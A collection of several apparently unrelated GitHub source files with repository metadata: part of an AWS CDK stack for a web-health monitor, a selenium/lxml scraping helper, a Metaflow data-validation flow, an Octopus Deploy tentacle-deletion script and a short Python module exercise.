bktToDBHandler.apply_removal_policy(RemovalPolicy.DESTROY)\n bucket_to_db.grant_full_access(bktToDBHandler)\n \n bktToDBHandler.add_environment('bucketName', bucketName)\n bktToDBHandler.add_environment('bktTotable', bucket_to_db.table_name)\n WebHealthLambda.add_environment('bktTotable', bucket_to_db.table_name)\n WebHealthLambda.add_environment('topic_arn', my_topicARN)\n \n #define api with endpoint as lambda and then invoke table in that lambda \n # perform CRUD operation according to request sent to API\n #define resources in stack but when will each operation occur,\n #like what will be the user that'll be interacting with the API to tell it \n # to perform Create, Read, Update, Delete?\n\n \n #dynamo lambda for writing alarm logs to table\n \n ApiHandler = self.create_lambda(\"ApiHandler\", \"./resources\", \"apiHandler.api_Handler\", role)\n ApiHandler.add_environment('bucketName', bucketName)\n ApiHandler.add_environment('bktTotable', bucket_to_db.table_name)\n bucket_to_db.grant_full_access(ApiHandler)\n \n \n # mak_api.\n # instantiating API Gateway\n apirole = self.api_lambda_role()\n self.create_makapi('mak-CrudApi', ApiHandler)#, True, apirole)\n \n dblambda_schedule = events_.Schedule.rate(Duration.minutes(1))\n dblambda_target = targets_.LambdaFunction(bktToDBHandler) #creating the target for the lambda function.\n \n \n '''\n write parameters for rule function.\n \n '''\n \n rule = events_.Rule(self, \"DBLambdaInvocation\", \n description=\"Periodic DB Lambda\", \n schedule = dblambda_schedule,\n enabled = True,\n targets = [dblambda_target])\n\n \n \n\n \n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% USER DEFINED HELPER FUNCTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\n\n '''\n api = defined here\n items = api.root.add_resource(\"items\")\n items.add_method(\"GET\")\n \n \n [*]--------api\n The rest API that this resource is part of.\n The reason we need the RestApi object itself and not just the ID is because the model is being tracked\n by the top-level RestApi object for the purpose of calculating it’s hash to determine the ID of the deployment.\n This allows us to automatically update the deployment when the model of the REST API changes.\n RETURNS IAPI\n \n api.root.addMethod(‘ANY’, redirectToHomePage); \n Type:Represents the root resource (“/”) of this API. Use it to define the API model\n // “ANY /” api.root.addResource(‘friends’).addMethod(‘GET’, getFriendsHandler); // “GET /friends”\n \n add_resource(path_part, *, default_cors_preflight_options=None, default_integration=None, default_method_options=None)\n \n '''\n \n def create_makapi(self,id_=None, handler_=None):#,cloud_watch_role=True,role=None):\n\n\n # creating a lambda-backed API Gateway\n api = gateway.LambdaRestApi(self, \n id = id_, \n handler=handler_,\n cloud_watch_role=True\n )\n \n '''\n allow_origins (Sequence[str]) – Specifies the list of origins that are allowed to make requests to this resource. 
\n    If you wish to allow all origins, specify Cors.ALL_ORIGINS or [ * ].\n    Responses will include the Access-Control-Allow-Origin response header. \n    If Cors.ALL_ORIGINS is specified, the Vary: Origin response header will also be included.\n    '''\n\n # adding resource and methods for it\n health = api.root.add_resource(\"health\")\n # health.add_cors_preflight(\n # allow_origins=['*'],\n # allow_methods=[\"ANY\"])\n \n \n health.add_method(\"GET\", gateway.LambdaIntegration(handler_)) # GET /health\n\n # adding resource and methods for it\n url = api.root.add_resource(\"url\")\n # url.add_method(\"GET\", gateway.LambdaIntegration(handler_))\n # url.add_cors_preflight(\n # allow_origins=['*'],\n # allow_methods=[\"ANY\"])\n\n url.add_method(\"GET\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # GET /url\n url.add_method(\"PUT\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # PUT /url\n url.add_method(\"PATCH\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # PATCH /url\n url.add_method(\"DELETE\", gateway.LambdaIntegration(handler_))#,credentials_role=role)) # DELETE /url\n \n return api\n \n \n \n def create_lambda(self, id_, asset, handler,role):\n return lambda_.Function(self, id_, \n runtime = lambda_.Runtime.PYTHON_3_6,\n handler = handler,\n timeout= Duration.minutes(1),\n code = lambda_.Code.from_asset(asset),\n role = role\n )\n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n ##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \n \n \n \n def create_lambda_role(self, policyName):\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. 
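For instance, both naming forms below are valid inputs to from_aws_managed_policy_name; the
prefix has to match how AWS itself names the policy (these two policy names are real, and
'role' stands for whichever iam_.Role is being configured):

    role.add_managed_policy(
        iam_.ManagedPolicy.from_aws_managed_policy_name("service-role/AWSLambdaBasicExecutionRole"))
    role.add_managed_policy(
        iam_.ManagedPolicy.from_aws_managed_policy_name("AmazonDynamoDBReadOnlyAccess"))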
Include the prefix when constructing this object.\n \n '''\n lambda_role = iam_.Role(self, \"Role\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n description = \"example role\")\n \n lambda_role.add_managed_policy(iam_.ManagedPolicy.from_aws_managed_policy_name(policyName))\n \n return lambda_role\n \n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n def create_table(self, id, partition_key=None, sort_key=None):\n '''\n Link: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb/Attribute.html\n aws_cdk.aws_dynamodb.Table Provides a DynamoDB table.\n Parameters\n scope (Construct) –\n id (str) – \n partition_key (Attribute) – Partition key attribute definition.\n sort_key (Optional[Attribute]) – Sort key attribute definition. Default: no sort key\n Attribute-> Represents an attribute for describing the key schema for the table and indexes.\n '''\n dynamo_table = dynamodb.Table(self, id,\n # table_name=tableName,\n partition_key= dynamodb.Attribute(name=partition_key, type=dynamodb.AttributeType.STRING),\n sort_key= dynamodb.Attribute(name=sort_key, type=dynamodb.AttributeType.STRING),\n removal_policy=RemovalPolicy.RETAIN)\n return dynamo_table\n \n \n \n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n \n \n def lambda_role(self, id=None, assumed_by=None, managed_policies=None): # creating a function for defining a lambda role\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. 
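An alternative sketch, not what the role helpers in this stack do (they attach broad managed
policies): grant only the actions a function needs through an inline statement instead:

    scoped_role = iam_.Role(self, "ScopedLambdaRole",  # hypothetical construct id
                            assumed_by=iam_.ServicePrincipal("lambda.amazonaws.com"))
    scoped_role.add_to_policy(iam_.PolicyStatement(
        actions=["dynamodb:GetItem", "dynamodb:PutItem", "dynamodb:Query"],
        resources=[bucket_to_db.table_arn]))  # bucket_to_db: the table created earlier in this stack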
Include the prefix when constructing this object.\n \n '''\n \n lambda_role = iam_.Role(self, \"Role\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n iam_.ManagedPolicy.from_aws_managed_policy_name('CloudWatchFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaInvocation-DynamoDB')\n ])\n return lambda_role\n\n\n\n def api_lambda_role(self, id=None, assumed_by=None, managed_policies=None): # creating a function for defining a lambda role\n '''\n Link To Docs: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam.html\n https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_iam/ManagedPolicy.html\n \n AWS Identity and Access Management Construct Library:\n Define a role and add permissions to it. This will automatically create and attach an IAM policy to the role:\n \n Class: ManagedPolicy:\n -example: my_role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name(\"service-role/AWSLambdaBasicExecutionRole\"))\n \n classmethod from_aws_managed_policy_name(managed_policy_name)\n Import a managed policy from one of the policies that AWS manages.\n For this managed policy, you only need to know the name to be able to use it.\n Some managed policy names start with “service-role/”, some start with “job-function/”,\n and some don’t start with anything. Include the prefix when constructing this object.\n \n '''\n \n lambda_role = iam_.Role(self, \"APiRole\",\n assumed_by=iam_.ServicePrincipal(\"lambda.amazonaws.com\"),\n managed_policies=[\n iam_.ManagedPolicy.from_aws_managed_policy_name('CloudWatchFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n iam_.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaInvocation-DynamoDB')\n ])\n return lambda_role\n # The code that defines your stack goes here\n\n # example resource\n # queue = sqs.Queue(\n # self, \"Sprint4MubarizQueue\",\n # visibility_timeout=Duration.seconds(300),\n # )\n \n \n def create_dbtable(self, id, partition_key=None):\n '''\n Link: https://docs.aws.amazon.com/cdk/api/v1/python/aws_cdk.aws_dynamodb/Attribute.html\n aws_cdk.aws_dynamodb.Table Provides a DynamoDB table.\n Parameters\n scope (Construct) –\n id (str) – \n partition_key (Attribute) – Partition key attribute definition.\n sort_key (Optional[Attribute]) – Sort key attribute definition. 
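For example, an illustrative call to this helper (the construct id and the item shape are made
up for the sketch):

    table = self.create_dbtable("makUrlTable", partition_key="url")
    # items stored in such a table then look like {"url": "https://example.com", "status": 200}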
Default: no sort key\n Attribute-> Represents an attribute for describing the key schema for the table and indexes.\n '''\n dynamo_table = dynamodb.Table(self, id,\n # table_name=tableName,\n partition_key= dynamodb.Attribute(name=partition_key, type=dynamodb.AttributeType.STRING),\n # sort_key= dynamodb.Attribute(name=sort_key, type=dynamodb.AttributeType.STRING),\n removal_policy=RemovalPolicy.RETAIN)\n return dynamo_table\n \n # def createNewDB(self):\n # # Get the service resource.\n \n # dynamodb = boto3.resource('dynamodb')\n \n # # Create the DynamoDB table.\n # table = dynamodb.create_table(\n # TableName='bktTotableDBNAME1',\n # KeySchema=[\n # {\n # 'AttributeName': 'id_',\n # 'KeyType': 'HASH'\n # },\n # {\n # 'AttributeName': 'url',\n # 'KeyType': 'RANGE'\n # }\n # ],\n # AttributeDefinitions=[\n # {\n # 'AttributeName': 'id_',\n # 'AttributeType': 'N'\n # },\n # {\n # 'AttributeName': 'url',\n # 'AttributeType': 'S'\n # },\n # ],\n # ProvisionedThroughput={\n # 'ReadCapacityUnits': 5,\n # 'WriteCapacityUnits': 5\n # })\n \n # return table","repo_name":"MubarizKhan/web-health-monitor","sub_path":"sprint5_mubariz/sprint5_mubariz_stack.py","file_name":"sprint5_mubariz_stack.py","file_ext":"py","file_size_in_byte":36698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"75035284908","text":"\n\"\"\"\nSimple web scraping utility functions written in Python.\nNamed after the 3D spider.\n\"\"\"\n\nimport requests\nfrom lxml import etree, html\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\ndef make_driver(headless=True):\n \"\"\"\n Creates a selenium driver interface for Chrome.\n You need to install the chromedriver provided by\n Google and make it accessible through PATH to be able to use it.\n \"\"\"\n opt = Options()\n if headless: \n opt.add_argument('--headless')\n return webdriver.Chrome('chromedriver', chrome_options=opt)\n \ndef fix_suburl(prefix, url, www=False):\n \"\"\"\n More often than not, URLs linked by a page are in a 'sub-URL' format :\n for example, if you scrape 'https://www.google.com', all `a` tags\n will point to URLs of the form '/news/10291029'. This function\n is here to safely merge the original URL and the sub-url to get\n a conformant URL that will be correctly scraped.\n If you already have a compliant URL, you can just concatenate the\n two. If the URL should also be completed with an HTTP(S)/WWW prefix,\n see `complete_url` below.\n prefix: the base URL of the website\n url: the sub-URL to append to the URL\n \"\"\"\n if url[0] == '/':\n return prefix + url\n else:\n return url\n \ndef complete_url(url, www=False, https=True):\n \"\"\"\n If your URL does not contain any HTTP protocol prefix, you can\n use this function to add one. 
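Illustrative expectations, assuming the implementation that follows:

    >>> complete_url('google.com')
    'https://google.com'
    >>> complete_url('http://google.com', www=True)
    'http://www.google.com'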
If you also want to add 'www' to\n the URL, use the boolean parameter of the same name.\n \"\"\"\n _www = 'www'\n _http = 'http://'\n _https = 'https://'\n https_www = _https + _www + '.'\n http_www = _http + _www + '.'\n \n if https_www in url:\n return url\n elif http_www in url:\n return url\n elif http_www not in url and _http in url and www:\n return url.replace(_http, http_www)\n elif https_www not in url and _https in url and www:\n return url.replace(_https, https_www)\n elif _http in url or _https in url:\n # already has a protocol prefix and no 'www' was requested\n return url\n else:\n return _https + url\n\nclass Scraper:\n \"\"\"\n A wrapper to perform web scraping on top of lxml, requests and selenium (with only\n Chrome support at the moment). You can directly provide a URL when you create\n the object to immediately start scraping data. If you need to use selenium, you\n need to use the `make_driver` function to create a driver and provide it to the object\n either in the constructor or the get function.\n \"\"\"\n def __init__(self, url=None, driver=None):\n if driver:\n self.driver = driver\n if url:\n self.get(url)\n \n def get(self, url, autocompletion=True):\n \"\"\"\n Scrape a URL using the requests module. Returned data goes into `self.page`, whereas\n raw HTML can be found in `self.html` and the lxml tree in `self.tree`. This function\n simply retrieves the HTML content without processing any client-side scripts. If the\n website you want to scrape makes heavy use of Javascript to display content, you need\n to use `get_full`.\n \"\"\"\n if autocompletion:\n nurl = complete_url(url)\n if nurl != url:\n print('\\'{}\\' autocompleted to \\'{}\\'.'.format(url, nurl))\n url = nurl\n\n self.page = requests.get(url)\n self.html = self.page.content\n self.tree = html.fromstring(self.html)\n\n def get_full(self, url, driver=None, headless=True, autocompletion=True):\n \"\"\"\n Scrape a URL using selenium. If you want client-side scripts to be executed before scraping,\n this is the function you should use rather than `get`. With selenium, we can load the page\n inside a real browser such as Chrome so that the Javascript is run by the browser beforehand.\n Aside from providing the URL, you have control over two options :\n \n 1. Provide a driver\n As opening a driver takes several seconds, it may be wise to create it beforehand then pass it\n to the function. If you don't need to use it more than once, you can ignore this, as the function\n will create a one-off driver if no driver is provided. This temporary driver will be closed once\n we have scraped the data. Otherwise, you should create your driver, then pass it to each call \n of the function for every URL you want to scrape data from.\n \n 2. Enable/Disable headless mode\n A browser running in 'headless mode' simply means that no resources are wasted on opening a\n GUI. 
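A quick sketch of the driver-reuse pattern described above; make_driver and Scraper are this
module's own helpers, and the URLs are placeholders:

    driver = make_driver(headless=True)
    sc = Scraper(driver=driver)
    for target in ['https://example.com', 'https://example.org']:
        sc.get_full(target, driver=driver)
        print(sc.xpath('//title/text()'))
    driver.quit()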
Headless mode is enabled by default, as scraping is automated and has no need for a GUI.\n This mode is also needed if you use this function on a native terminal, with no graphical\n capabilities.\n \n TODO: Add generic browser support.\n \"\"\"\n if not driver:\n opt = Options()\n if headless: \n opt.add_argument('--headless')\n self.driver = webdriver.Chrome('chromedriver', chrome_options=opt)\n else:\n self.driver = driver\n\n if autocompletion:\n nurl = complete_url(url)\n if nurl != url:\n print('\\'{}\\' autocompleted to \\'{}\\'.'.format(url, nurl))\n url = nurl\n\n self.driver.get(url)\n self.html = self.driver.page_source\n self.tree = html.fromstring(self.html)\n \n if not driver:\n self.driver.quit()\n\n def xpath(self, *exprs):\n \"\"\"\n Once you have scraped a URL, you can query it through XPath expressions.\n This uses the lxml module. You can pass several expressions at once to\n scrape multiple elements of different nature. The results will be returned\n together.\n \"\"\"\n if not exprs:\n return []\n return self.tree.xpath(exprs[0]) + self.xpath(*exprs[1:])\n\nif __name__ == '__main__':\n sc = Scraper()\n url = 'https://www.google.com'\n sc.get(url)\n results = sc.xpath('//a/@href')\n print(results)\n \n","repo_name":"Zebralt/pyutils","sub_path":"lucas.py","file_name":"lucas.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20634942462","text":"\nfrom metaflow import FlowSpec, step, card\nimport json\n\nclass Validation_Flow(FlowSpec):\n \"\"\"\n load the iris data and validate it with great_expectations\n \"\"\"\n @card \n @step\n def start(self):\n \"\"\"\n Load the data\n \"\"\"\n #Import scikit-learn dataset library\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n\n #Load dataset\n self.iris = datasets.load_iris()\n self.X = self.iris['data']\n self.y = self.iris['target']\n self.labels = self.iris['target_names']\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2)\n self.next(self.data_validation)\n \n\n\n @step\n def data_validation(self):\n \"\"\"\n Perform data validation with great_expectations\n \"\"\"\n import pandas as pd\n from ruamel import yaml\n import great_expectations as ge\n from great_expectations.core.batch import RuntimeBatchRequest\n\n context = ge.get_context()\n\n \n from sklearn import datasets\n iris = datasets.load_iris()\n df = pd.DataFrame(data=iris['data'], columns=iris['feature_names'])\n df[\"target\"] = iris['target']\n #df[\"petal length (cm)\"][0] = -1\n\n # configuration for data validation checkpoint\n checkpoint_config = {\n \"name\": \"flowers-test-flow-checkpoint\",\n \"config_version\": 1,\n \"class_name\": \"SimpleCheckpoint\",\n \"run_name_template\": \"%Y%m%d-%H%M%S-flower-power\",\n \"validations\": [\n {\n \"batch_request\": {\n \"datasource_name\": \"flowers\",\n \"data_connector_name\": \"default_runtime_data_connector_name\",\n \"data_asset_name\": \"iris\",\n },\n \"expectation_suite_name\": \"flowers-testing-suite\",\n }\n ],\n }\n context.add_checkpoint(**checkpoint_config)\n\n # results of data validation\n # then build and view docs\n results = context.run_checkpoint(\n checkpoint_name=\"flowers-test-flow-checkpoint\",\n batch_request={\n \"runtime_parameters\": {\"batch_data\": df},\n \"batch_identifiers\": {\n \"default_identifier_name\": \"\"\n },\n },\n )\n context.build_data_docs()\n context.open_data_docs()\n\n self.next(self.end)\n\n \n @step\n def 
end(self):\n \"\"\"\n End of flow!\n \"\"\"\n print(\"Validation_Flow is all done.\")\n\n\nif __name__ == \"__main__\":\n Validation_Flow()\n","repo_name":"outerbounds/full-stack-ML-metaflow-tutorial","sub_path":"flows/ecosystem/iris_validate.py","file_name":"iris_validate.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"37"} +{"seq_id":"11557066719","text":"import json\r\nimport requests\r\nimport sys\r\nimport warnings\r\n\r\n\r\n\r\n# Define Octopus server variables\r\noctopus_server_uri = sys.argv[1] # 'http://octopus/' \r\noctopus_server_uri = octopus_server_uri + '/api'\r\noctopus_api_key = sys.argv[2] #'API-xxx'\r\n\r\nheaders = {'X-Octopus-ApiKey': octopus_api_key}\r\n\r\n\r\ndef get_octopus_resource(uri):\r\n response = requests.get(uri, headers=headers)\r\n response.raise_for_status()\r\n\r\n return json.loads(response.content.decode('utf-8'))\r\n\r\n\r\ndef get_by_name(uri, name):\r\n resources = get_octopus_resource(uri)\r\n return next((x for x in resources if x['Name'] == name), None)\r\n\r\n\r\nspace_name = ''\r\nprefix = sys.argv[3] #TentacleName\r\n\r\ntopology = sys.argv[4] #Topology type\r\nprint(\"prefix is:\",prefix)\r\nprint(\"topology is:\",topology)\r\n\r\nif topology == \"small\":\r\n targets = [prefix+\"-appvm\"]\r\nelif topology == \"medium\":\r\n targets = [prefix+\"-appvm\", prefix+\"-dbvm\"]\r\nelif topology == \"large\":\r\n targets = [prefix+\"-appvm\", prefix+\"-dbvm\", prefix+\"-rmqvm\"]\r\nelse:\r\n print(\"topology does not match any defined ones:small,medium or large\")\r\n sys.exit()\r\n \r\nspace = get_by_name('{0}/spaces/all'.format(octopus_server_uri), space_name)\r\nprint (\"Tentacles to be deleted:\",targets)\r\n\r\nfor target_name in targets:\r\n target = get_by_name('{0}/{1}/machines/all'.format(octopus_server_uri, space['Id']), target_name)\r\n if target:\r\n print (\"Deleting Target:\",target_name)\r\n print ('Tentacle Found:',target_name,'with Target-ID:',target['Id'])\r\n uri = '{0}/{1}/machines/{2}'.format(octopus_server_uri, space['Id'], target['Id'])\r\n response = requests.delete(uri, headers=headers)\r\n response.raise_for_status()\r\n print(target_name,'Tentacle has been deleted')\r\n else:\r\n print(target_name,'Tentacle was not found')\r\n warnings.warn('Tentacle was not found')","repo_name":"saurabhmik/test","sub_path":"DeleteTenant.py","file_name":"DeleteTenant.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21839029442","text":"from oslo_log import log as logging\nfrom oslo_utils import uuidutils\n\nfrom newcloudo2o.common.i18n import _LE\n\nfrom newcloudo2o.db import api as db_api\nfrom newcloudo2o.db import core\nfrom newcloudo2o.db import models\n\nLOG = logging.getLogger(__name__)\n\n\ndef create_ag_az(context, ag_name, az_name):\n aggregate = core.create_resource(context, models.Aggregate,\n {'name': ag_name})\n core.create_resource(\n context, models.AggregateMetadata,\n {'key': 'availability_zone',\n 'value': az_name,\n 'aggregate_id': aggregate['id']})\n extra_fields = {\n 'availability_zone': az_name,\n 'metadata': {'availability_zone': az_name}\n }\n aggregate.update(extra_fields)\n return aggregate\n\n\ndef get_one_ag(context, aggregate_id):\n aggregate = core.get_resource(context, models.Aggregate, aggregate_id)\n metadatas = core.query_resource(\n context, models.AggregateMetadata,\n [{'key': 'key', 'comparator': 'eq',\n 
'value': 'availability_zone'},\n {'key': 'aggregate_id', 'comparator': 'eq',\n 'value': aggregate['id']}], [])\n if metadatas:\n aggregate['availability_zone'] = metadatas[0]['value']\n aggregate['metadata'] = {\n 'availability_zone': metadatas[0]['value']}\n else:\n aggregate['availability_zone'] = ''\n aggregate['metadata'] = {}\n return aggregate\n\n\ndef get_ag_by_name(context, ag_name):\n filters = [{'key': 'name',\n 'comparator': 'eq',\n 'value': ag_name}]\n aggregates = get_all_ag(context, filters)\n if aggregates is not None:\n if len(aggregates) == 1:\n return aggregates[0]\n\n return None\n\n\ndef delete_ag(context, aggregate_id):\n core.delete_resources(context, models.AggregateMetadata,\n [{'key': 'aggregate_id',\n 'comparator': 'eq',\n 'value': aggregate_id}])\n core.delete_resource(context, models.Aggregate, aggregate_id)\n return\n\n\ndef get_all_ag(context, filters=None, sorts=None):\n aggregates = core.query_resource(context,\n models.Aggregate,\n filters or [],\n sorts or [])\n metadatas = core.query_resource(\n context, models.AggregateMetadata,\n [{'key': 'key',\n 'comparator': 'eq',\n 'value': 'availability_zone'}], [])\n\n agg_meta_map = {}\n for metadata in metadatas:\n agg_meta_map[metadata['aggregate_id']] = metadata\n for aggregate in aggregates:\n extra_fields = {\n 'availability_zone': '',\n 'metadata': {}\n }\n if aggregate['id'] in agg_meta_map:\n metadata = agg_meta_map[aggregate['id']]\n extra_fields['availability_zone'] = metadata['value']\n extra_fields['metadata'] = {\n 'availability_zone': metadata['value']}\n aggregate.update(extra_fields)\n\n return aggregates\n\n\ndef get_pod_by_az_tenant(context, az_name, tenant_id):\n pod_bindings = core.query_resource(context,\n models.PodBinding,\n [{'key': 'tenant_id',\n 'comparator': 'eq',\n 'value': tenant_id}],\n [])\n for pod_b in pod_bindings:\n pod = core.get_resource(context,\n models.Pod,\n pod_b['pod_id'])\n if az_name and pod['az_name'] == az_name:\n return pod, pod['pod_az_name']\n elif az_name == '' and pod['az_name'] != '':\n # if the az_name is not specified, a default bottom\n # pod will be selected\n return pod, pod['pod_az_name']\n else:\n pass\n\n # TODO(joehuang): schedule one dynamically in the future\n if az_name != '':\n filters = [{'key': 'az_name', 'comparator': 'eq', 'value': az_name}]\n else:\n filters = None\n\n # if az_name is valid, select a pod under this az_name\n # if az_name is '', select the first valid bottom pod.\n # change to dynamic scheduling in the future\n pods = db_api.list_pods(context, filters=filters)\n for pod in pods:\n if pod['pod_name'] != '' and pod['az_name'] != '':\n try:\n with context.session.begin():\n core.create_resource(\n context, models.PodBinding,\n {'id': uuidutils.generate_uuid(),\n 'tenant_id': tenant_id,\n 'pod_id': pod['pod_id']})\n return pod, pod['pod_az_name']\n except Exception as e:\n LOG.error(_LE('Failed to create pod binding: %(exception)s'),\n {'exception': e})\n return None, None\n\n return None, None\n\n\ndef list_pods_by_tenant(context, tenant_id):\n\n pod_bindings = core.query_resource(context,\n models.PodBinding,\n [{'key': 'tenant_id',\n 'comparator': 'eq',\n 'value': tenant_id}],\n [])\n\n pods = []\n if pod_bindings:\n for pod_b in pod_bindings:\n pod = core.get_resource(context,\n models.Pod,\n pod_b['pod_id'])\n pods.append(pod)\n\n return 
pods\n","repo_name":"lilingxing20/newcloudo2o","sub_path":"newcloudo2o/common/az_ag.py","file_name":"az_ag.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1454653356","text":"self = eval('self'); output = self.output # this code is cosmetic to remove the red syntax highlight error from the pycharm IDE\r\n\r\nimport logging\r\nimport os\r\ncwd = os.getcwd()\r\n\r\nlogging.info (\"working dir:\"+str(cwd))\r\n# set my variables used by loaded template\r\nvars = {'myVar': '.PY Loaded Template',\r\n 'count': 100,\r\n 'test':'helloworld'}\r\nself.templateRun('py_loaded_template.html', vars)\r\n","repo_name":"sdetoni/QuickWebDaemon","sub_path":"webapps/demo/ws_docs/demos/load_template_ty.py","file_name":"load_template_ty.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2638689227","text":"#module\n\n#1. exercise: a) create hello.py -> function hello()\n#b) import hello.py\n#c) use function hello() in this file\n\nimport hello\n\ntext = input(\"Your text: \")\ntext2 = input(\"Your new text: \")\nhello.hello(text)\nhello.newfunction(text2)\n\n#if we need only 1 function from module, we can import only this function\nfrom hello import newfunction\nnewfunction(text2)\n\n#if we want to use shorter form we can import all (*) from module\nfrom 